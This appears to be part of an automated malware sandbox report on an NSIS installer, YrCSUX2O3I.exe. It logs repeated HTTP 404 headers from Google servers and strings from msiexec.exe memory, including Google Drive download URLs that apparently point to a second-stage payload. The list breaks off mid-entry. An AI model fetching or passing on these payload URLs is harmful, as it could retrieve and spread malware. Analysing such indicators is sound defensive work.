https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSf_N4WPUo5YAJ8mWThTymqOGMtqHP_njZvjkK2xzPn_Iu7WDL_W-SW5cBU002hScZhgUPuF-0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:11 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-h-GZUrZqbbbnGTH4ylVxJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQPYXvFopy1EDV35xLVjggWiRaibPJPFlLkCpKToddEZQzdQCc5EjamZPAL7t45eJiOContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:14 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-wMwb2b4_dp2CTiIH_Sj69A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQf9h6ntY22_iNSNSsaR5EBSIvm1vNYKIeyUtNwbXV-xW2nmA_8bRrALcS5K28iQKp8ykInK2sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qqeIylw2gDuLDRuv6Vr9nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5NNLyxqNAhcaGTyf5DrM5r6XkLOaTpfNe1PoIlkPCBaTvS94D_KUzFlkUi-i84UkH1_JMT_EUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:18 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7ly0QPrlCxJy_JmbxXVLsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS0dH5gPxIKLQjaHCRjaCJV6_PrmqNR0-rqbItUL5OopRcL5tlvwRNTmfX5W4MI9VOlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0O89hh-CmwB9Q42LRc6Dmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5T3pxZ1cnATdwY8kai8GqW67n_7BOTtkv2U75vsoQ1Rzbc68dJbeYuJV9vm9pKShhoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-HWyt--RSRtmhR3Ze0MUUEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRcI9kJLWCVj4zNnkPyO5ink68JUGSXs5qbPJacsva0zJKtLh9xmNEpl88XFj__sFJXContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-YPfkk4IEd0PsBU5N-VAiwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7k3flitRR7HbbtluKTf9iGhgR5oOgoK5Tj00YCxAajma2GkjSyiCiuYDLogLkiriY3OcrNJ1MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:28 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-YlM5fySCOx6Y8U4HjFQK3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSsJaHM8ZID_RUSr7QbhDc8egCOSyxw-vTHGGN_a2ursp8JJtiTVsdzWf5v12yuLjpvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:30 GMTContent-Security-Policy: script-src 'nonce-THGXdzEIljQTtz1jMGx2Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT4QN3obU-V2e7G99WZnyN8KpP8aAjoPYkkZ7uDjxRFd5epXCJwcsQsaoE6Fs2WzXySb2heQEYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-1vMHemRUBHz9hacSIoVhfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgROWE_2dDeHaLLZtcWPyE7Jx_B8G3488R9h9pJHV7g3738by8f8BJK49aECD8EJADFHLXaRtgcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 00:31:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SE2xFG62UeOZ9hImxd_QNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: YrCSUX2O3I.exe, YrCSUX2O3I.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135941062.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007F99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2455058177.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=d
    Source: msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: msiexec.exe, 00000008.00000003.2284814512.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2135873204.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2273099966.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2147098085.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161927602.0000000007FF3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2231876313.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
    Source: msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download0
    Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2585091489.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2526749849.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2575236744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2549615290.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2515750713.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download4
    Source: msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2444511172.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2318203930.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2491715042.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2421732807.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2385950640.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2329580852.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2503831860.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2432767321.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 